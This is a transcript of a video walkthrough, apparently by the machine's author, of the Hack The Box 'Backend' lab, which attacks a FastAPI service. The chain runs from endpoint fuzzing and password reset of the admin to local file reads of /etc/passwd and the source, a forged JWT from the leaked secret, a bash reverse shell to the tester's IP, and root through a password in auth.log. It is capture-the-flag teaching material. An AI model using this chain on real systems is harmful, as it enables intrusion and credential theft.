What's going on YouTube? This is Ipsec. I'm doing Backend from the UHC April qualifiers, and the whole idea around this box is you have access to a backend API but no front end, so you just have to explore the API manually. And I created this box because there hasn't really been a box on Hack the Box to my knowledge of just attacking an API. There's been some boxes that involved API lately, but API wasn't the main focus. And there's a lot of subtle differences when doing like fuzzing across an API. For instance, when you're doing a gobuster or durbuster, whatever you want to call it, it's not about file name and extension. It's about file name and method. Additionally, a lot of the web crawlers just don't work. So we figured out a lot of those nuances in this box, and hopefully it helps anyone out there that is looking for how to get started in testing an API interface. So with that being said, let's just jump in. As always, I'm going to start with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it backend, then the IP address of 10.10.11.161. This can take some time to run, so I've already ran it. Looking at the results, we see a lot of lines of text. However, we do see there's 998 closed ports, and by default, nmap scans the top 1,000 ports, so we know there's only 2 ports open. The first port is SSH on port 22, and its banner tells us it's an Ubuntu server. Nothing really interesting there. The second port we have is HTTP on port 80, and its banner tells us it's UV Icon. If we just Google this, we can see it's a ASGI web server implementation for Python. ASGI is Application Service Gateway Interface, I want to say. Asynchronous server gateway interface. So it's like WSGI, just with a bunch of async calls. So we know this is some type of Python web server. Not much else there. Nmap doesn't exactly identify this as a web service, or maybe it does, it just doesn't know what type. So we see a bunch of just random stuff. My favorite thing is like 404, and they actually like spell it out. But the main interesting thing is we got content type application JSON, and the server is responding to us with JSON. So we're probably dealing with an API. The title, it doesn't have a title. So there's that. And then this, because it didn't exactly identify the server, it's outputting the whole like socket of what it requests, so you can try to better identify the service in the future. So not much information in nmap. Let's just go take a look at the web service. So 10.10.11.161, we have UHC API version 1.0. And if I look at the source code, that's all there is. Firefox is just making that JSON pretty. So we can try to like use gobuster as things to enumerate this. However, when doing with APIs, I actually created this box to show off Pharaohbuster and just realized it didn't do a good job. Gobuster didn't do a good job. The tool Kite Runner that I learned from doing an AMA with Insider PhD didn't do a great job. I'll show what I mean by that in a minute, but let's do gobuster dir -u http 10.10.11.161 -w for word list. Let's do opt seclist word list, or what is it? Discovery web content raf small words.text. And then I think that's all we need. And it's going to start brute forcing this. And we get a /docs returns a 401 and /API returns a 200. So if I go to /docs, it's requiring some type of authentication. If I go to /API, it tells me there's a v1 endpoint. If I go to /v1, it tells me there's 2 endpoints, user and admin. So if I go to /user, we get a not found. And if I put this in burpsuite now, because at this point it's going to be handy analyzing everything in burpsuite, because APIs are very specific in the sense that they return somewhat unique HTTP codes. At this point, it's not that unique now. Everyone knows what the 404 is. If we just do the other endpoint of admin, it returns a redirect to admin /, and that one tells us we're not authenticated. So in API terminology, there is a user endpoint. Like this is probably a controller. There's probably a user.py on the server, and it just doesn't have a default function. Typically with users, the next thing is like an ID number. So if I do user/1, we do get information here. If I do user2, we don't get anything because there's no user2 on the system. So we could try like other endpoints here, like user login. But again, the API route is coded that what comes after user in this context, and if it's a GET request, is going to be an ID. So we have to fuzz the actual methods. So I did like a post on user login. We get a different message of saying fields required. But kind of want to show like my beef with kind of the tools. So if I try to do this with gobuster. So if I do gobuster and we want to do what? API v1 user and fuzz this. Because it defaults to like a negative status code, and every page, if I do like user something, it's doing a different code. We can like say --wildcard. If I just do this, we get a lot of things. We have to play with the status code a lot. Probably hide 422. Also, I think 404 as well. There's just a lot of just extra flags we'll have to do. If I used a tool like Pharaohbuster on this, so Pharaohbuster, unlike gobuster, this one uses a whitelist. So we have the status codes here, and the status codes have to appear here, and the API will give us different status codes than what's here. gobuster, if we went back to this tool, it's a negative search list. So this is using a deny list instead of allow list, or maybe whitelist instead of this is a blacklist instead of whitelist type of thing. So the tools definitely change there. And I know a lot of people are talking to the creator of Pharaohbuster. He's super responsive. So maybe by the time you're watching this video, if the box has been out for a week or two, like Pharaohbuster has been improved to be better at API scanning. But that was my main, like, quote unquote, beef with these tools, and why I like using things like wfuzz. You could use fuff, but I find wfuzz has more features, or at least I know how to use the features in wfuzz more. So if I'm doing anything ever advanced, I like just using wfuzz. But -u, we can do the URL. So we can copy this. And I'm actually going to put fuzz here because we want to fuzz things of the URL. We want to do -x to change this method to a post. And then -w for word list, opt, sec list, discovery, web content. And when I'm fuzzing APIs, I generally just use the common.text because it's exponentially smaller than the other word lists. So if I fuzz this, we'll right away get a bunch of status codes. We want to now hide 404s and 405. And if we wanted to look, we can go over to burpsuite and see exactly what 405 is. So if I do user.bashrc, as I think what it had, what was one that was 405? 405.bashrc. Why do I get unprocessable entity? Because we need to change this to post. It's just method not allowed. And then 404 is file not found or something. But 307, I don't know what that is. We can look at CGI-bin. And if we add a slash, it redirects us. So anytime we have a trailing slash, it's going to send us a temporary redirect to something that doesn't have that slash. And here's where we'll get that different error code of a 405. So there is a login endpoint. And there should be one other one that we want to see. And if you want to count the word list size difference between these, since we're still waiting on this to run, we can do wc-l on common.text and also raf small words.text. And you can see there's a huge difference between 4,600 and 43,000 lines. So that goes much quicker. And there's an endpoint called signup. So let's play with this endpoint signup. I'm going to do it over in burpsuite just because it's easier to see. So if I do sign up, we can see the body is missing a field. So I'm just going to put user is equal to IPsec. We'll just put a random field in this. And what we have here is, let's see, expecting value. Do I need a line break? That is not what I expected. I was expecting it to say a dictionary it wanted a dictionary or something. But we do have an error with JSON decode. So let's do user : IPsec like this. And we have value missing. So this is a bit weird. If I do this with curl, it's going to behave completely differently. So we'll show this real quick, because I'm learning something new here. burpsuite's doing something I'm not understanding. I wonder if it's adding the content type for me, even though I did not specify it. Yeah, there's no content-type, but okay. Let's register a user real quick. So it's telling us we need 2 fields in the body. The first one being email, and the second one being password. So I'm going to do email is equal to root@ipsec.rocks, and we'll do the password is equal to IPsec. So we do that, and it says a 201 created. So before I move forward, I just want to test this out because this is the first time I'm doing it in burpsuite. When I did it in curl, and it behaved completely differently. So let's do curl HTTP 10.10.11.161 API v1 user sign up, and I want to make this a post request. I'm going to do -d user is equal to IP, and I'm going to pipe it to JQ. And this is the error message I was expecting, is value is not a dict. So if I go back here and I do the same thing of user is equal to IP, we get a JSON decode error. So I think burpsuite is smart enough where it's saying, this is an API, let's send it. I don't know what it did. This is bizarre to me. Because if I change this to be -h content type application JSON, it's still saying not a dict. So there's something fundamentally different with these requests. And I'm not sure what it is. But there is something. It's like in my head now, do I troubleshoot this live or we just move on? You know me, let's do it live. So I'm going to do sudo wireshark, and we're going to look at what these requests look like on the wire, because this is bizarre. And maybe it won't be after I look at it. I'm going to send this post request. We're going to send this one. These should be somewhat identical, but how did they differ? So let's search by HTTP. We can turn Wireshark off. And let's right click, follow HTTP stream. And this one, we have content type of X. Oh, so I'm guessing because this is probably my curl. Yeah, we can see curl here. Curl auto-appended this application xwdub thing. And that's why we got value is not a dict. I bet if I went over to the next stream, let's do HTTP, grab this next one. So this one is going to be the burpsuite one. We don't have a content type header, and that's why we got this JSON decode issue. So it wasn't burp magically adding something. It was that curl thing that magically added something. And that's one of the reasons why I like doing things in burp, because generally what you see is what you get. If we change this content type, burp tells us it is changing the content type for us. But that was a long, I guess, segue into something that wasn't too beneficial, but I learned something, so hopefully you learned something. We have the user created with root@ipsec.rocks and a password of IPsec. There was an endpoint called login, so we can kind of troubleshoot this the same way. We're going to hit login, and I'm just going to do content type application JSON, just so it knows it, even though apparently it's not needed. I guess in Python, it'll have some magic like typing that says, you didn't specify the content type, but you sent us a dict, so we're going to try to JSON decode it or something weird like that. But there's probably a dragon somewhere in there. And by dragon, I mean like a weird bug that you can do of like type confusion, because if you gave it the xwww URL encode this content type, it never sent it to the JSON. But if you didn't give it anything, then it did. So you definitely go down weird paths of logic in Python with that change, at least the FastAPI library. But I'm just ranting at this point. So let's get back to this. We make a request to login, and it tells us we need two fields in a body, username and password. So I'm going to do username is equal to root at ipsec.rocks, and we'll do password is equal to ipsec. We go in, and it's still telling us the fields are missing. So maybe this endpoint isn't expecting JSON data. Maybe this is xwww. What is it? Is it URL encoded? Let's just look at this and copy and paste the exact field. That's not it. Stream equals 0. Follow. Here we go. This is the field for sending URL encoded data. And then we can just change the username and password. So we do username is equal to this, and password is equal to ipsec. We go to log in, and it gives us a JWT token. So we have access token, and then this string. This is really just a JWT. So now we can authenticate to the application. So if I make a request to /docs, it says not authenticated, but let's add our JWT in there. So I'm going to send this. We should be intercepting. Here we go. And I'm going to add the authorization header, because this is how JWTs are used. It's a bearer token. I'm going to copy this and forward it. And then it's going to make a request to openapi.json. We put a bearer token in there. And then we have the documentation of the API. So the default routes, this is just all the hard coding I did to point you to API v1. We may go over this a little bit at the end, but we can just hide this and see how this is. So this is, I think, called Swagger documentation or something. It's just automatic documentation that's made by the openapi.json file. It's not a FastAPI thing, but all FastAPIs have this. And FastAPI is just the library I use to create this API server. If you Google Python FastAPI, you can pull it up. So as like Flask and Django is to making websites, FastAPI is to making APIs in Python. It's super amazing. There is this secret flag endpoint we can see, and it tells us it's the user flag. So if I click try it out, click execute, we can see it responds with user.text. So that's the very first flag in this. We also have this update password, and it wants GUID and password. And then we also have like checks on admin. And we can see just from these routes why user 404 on /user. Because if I look here, there's nothing defined for just user. It goes straight into endpoints underneath of user. And admin, it has a thing on just regular admin, and it's an admin check. It checks if you are an admin. And right now it says unauthorized, not authenticated, because we're not authenticated the application. We can click on this little lock and this and authenticate ourselves. So if I do root at ipsec.rocks, type a secret password of ipsec and click authorize, it's going to authenticate us. And now when I click on this, it just says results false because our user is not an admin. If I go up to this user ID, we can do 1, see the response. This one is admin at htb.local, and it is a super user, so probably admin. I'm going to copy his GUID because that UpdatePass did reference it, but I do want to show what my account looks like. of is super user is false for me. So I'm going to go down to the UpdatePass. I'm going to click try it out. I'm going to put in the GUID for admin, and the password will be please subscribe. Click execute, and we can see it looks like it updated and we have a new hashed password. I bet we could crack that and the crack would come out to be please subscribe, but why do that when we can just try to authenticate? So I'm going to log out and we'll log back in with admin@htb.local, password of please subscribe. And now I'm hating myself for making that password because there's a lot of characters I can typo. But I didn't, and we log in. I can hit this admin check, and we see the result is now true. So I am an admin. And if I make a request to this file, if we do try it out, we can do etc passwd, and we can see the contents of the passwd file. Now, there was another endpoint, exec, to execute a command. Execute commands is so much sexier than getting files off a server. So I'm just going to run the whoami command, and we get an error message that says the debug key is missing from the JWT. So we have to find a way to put debug in our JWT. And the JWT is just this token. So at this point, we could look at what our token looks like. So if I just go to like jwt.io, which is the best way to parse these, paste it in, we can see the data. It's an access token. It was expired. It was issued at subscriber is super user and GUID. So there's not much information here, but we want to add a debug flag in here. So in order to do that, we have to find where the secret signing key is. And we do have an LFI on this application, so we can potentially find that. I was seeing if I could make this box go up, but I can't. So what I'm going to do is intercept a request, and we'll do it in burp, so when we send files, we can see them without scrolling. So go to proxy, repeater, like this, and we get the file. So I'm going to go to /proc self cmd line, because I like checking this out, and we can see I'm in home, HTTP, UHC, virtual environment, Python 3, and not much more information there. So I'm going to check the environment. So proc self environ, and we have the app module, app.main. So this file is in the app directory, and it's main.py. And the working directory is home HTTP UHC. So if we combine that, so home HTTP UHC app main.py, we get the source code here. So let's copy this, and we'll put it in, let's see, I wonder if I just do echo and print it. It still prints the ends. So I'm going to just type this main.py, set paste, and then we'll do a search and replace for \n and replace it with a real line break. That was wrong. I never get that right the first time. Search for \n and replace it with \arb. Try that one. There we go. So now we have something. It's not perfect because it's still escaping a lot of things we didn't want escaped, like these quotes. But the main thing I wanted from this app is to identify how it's signing it. So I'm going to look at the import statements. And one of these will probably stick out. We have a from app.core.config on line 20. And it's importing settings, but I just want to get this config file. So let's go back here. We can do app core config.py. And then we want to copy this. And then vi config.py. Paste. And let's clean this up. There we go. And we have a JWT secret of super secret signing key -HTB. So I always hate just copying out of Vim for some reason. I never have good luck with it. So I'm going to go over to less. So I can copy and paste this. And I'm going to go back to jwt.io. And I'm going to change this to add debug is equal to true, or colon true. And I'm going to erase the your 256-bit signature, put in my key. I always hit home and end when on this to make sure I didn't copy and paste wrong. My biggest pain with this is it's like your secret. It has something, and I always will click somewhere here, paste it in, and this looks like I have it, but because on this website it's not default, you get some of the default values it has. So one of the things I always double check when I'm here is hit home end to make sure it begins and ends with what I want. But that's besides the point. We can probably go here and let's just forward this one request to make that happy. And then I'm going to go down to exec. And now let's test if we can run a command. So burpsuite is intercepting. I'm going to click execute. Go to repeater tab. We have debug key as missing. But if I take the key that we have just forged and signed on jwt.io, we should have the debug flag and it responds with HTTP. Now, the issue here is going to be we can't use slashes because anytime we put a slash in, it's going to change how the thing behaves. So if I try like echo ABC, and we probably have to do a plus here, or maybe %20. We have ABC. If I put a slash here, it's not found because we're changing the endpoint. And I think a slash is 2F, and we still get not found. So slashes are really bad characters in a payload, so we want to avoid those. The best way to avoid it is use base64. So I'm going to do an echo, and we'll do bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. I'm going to put it in single quotes, base64-w0. Now there's one potential issue here. That plus is going to cause an issue. We could get rid of like the special characters by doing this and just putting a space where you think those are in this and kind of getting rid of those. We can probably get rid of that equal. And now we just have a pure alphanumeric payload, which I think this will work easily. So we can show this working real quick. But I just want to show one of the common mistakes I see people make when they do this. So we want to exec echo-n, paste in the base64, decode it, execute bash. And this will work because our payload is alphanumeric. Or maybe it won't. I guess because we can't use pluses. So my whole thing is irrelevant because we have to encode all characters anyways. So if I encode all characters, we get the shell. What I was going to say is with this one, we have to make sure this plus is encoded. But because we had to encode anyways, it doesn't matter. If I get rid of this, we can go to this one payload here that has pluses in it, and it's still going to work. So us taking the care and making the base64 alphanumeric really saved us no time. But I always like doing it because it can be a bad issue in edge cases, and you may miss things and may just burn a lot of time. And it takes a few seconds to make sure that's alphanumeric, but we can see that one worked as well. So now we have a shell on the box. So I'm going to do python 3-c import pty.spawn bin bash. Okay. stty raw minus echo foreground, hit enter twice, and now we have a real shell on this. And the thing that really sticks out is auth.log. And if I look at it, we can see authentication attempts. So logging success, admin at http.local, we have a failure. And then more successes, and we can see these are logins. But one of the common things, if you ever look at auth logs, is users accidentally typing in the password in the username field. So in this case, that's what happened. If we just do su, we can switch to the root user like that and pop the box that way. But I want to look at the actual FastAPI code so we can kind of talk more about the routes before we just end this video. So I'm going to go in SSH and let's just drop our private key or public key there. So SSH keygen-f. I'm going to call this backend, I guess. Cat backend.pub. And we'll put this in authorized keys. Let's see here. Echo to authorized keys. Now if I sh-i backend root at 10.10.11.161, does it let me in? It does. So we can SCP the file. So I'm going to SCP root, and we want home HTTP UHC, which is where the application is. Put it in just our directory. Have to specify -r to be recursive because it is a folder. I probably should have tarred that up before sending it because this is going to take a while. So let's Control C this. Go back over here. HTTP tar-c jvf uhc.tarbz2 UHC. And then we can just download UHC tar bz2. Wait for this to finish copying. So I'm going to pause the video to let this tar finish. And there we go. We have the tar. We can now SCP it back to ourselves. And then while that goes, let's see. Do I have Codium? I do. Open up Codium. Tar xjvf UHC. Let's see. This is altered source code. That's fine. So tar cjvf uhc.tar.bz2. And let's go into the folder. So UHC, this box is backend, UHC. Okay. And here we have the code for this. So if I go in app, we got main.py. This is where it imports everything. And here are just the default endpoints I had created. Like I said before, hitting a directory and it telling you the endpoints isn't something that's common, but this whole API v1, I think this is how FastAPI documentation does it. So I didn't want to make people guess that's what was happening, so I kind of like handheld the way through that. But if we go into the API directory, into v1, into endpoints, we can see how it kind of works. So all I do is router.get, and this is specifying user ID. And here I'm doing CRUD, which I forget what that stands for. It's another web application nomenclature. I think it's like create, remove, update, delete. Yeah, that's what it is. So it's just basic database nomenclature, how to manage databases. If I went into, let's see, where is CRUD stored? It's in app. So if I do app, oh, CRUD right here. So my CRUD user, I have a class here. I have functions, get by email or update. I have a special thing for update because I'm going to take in a plain text password and replace it with the hashed password, but it's different. So if you want to look at like FastAPI documentation or how I learned, I just used the ultimate FastAPI tutorial. I think this is it. This is when I was learning FastAPI, I followed this tutorial. And when I did it, I think they stopped at authenticating via JWT. But that's a good starting point. But we can see here in this, we have definitions, right? So router.get/user ID, router.post/login. So this is why we have to fuzz by methods, because of just how these routes work. It's looking for put methods on secret flag endpoint. Generally speaking, like get is going to get data, post is going to create or do a login, put is going to update something. There's like delete, which will remove things. But yeah, I didn't really plan on explaining this much. I'm probably not doing a great job. But yeah, I hope this somewhat makes sense. And yeah, take care, guys, and I'll see you all next time.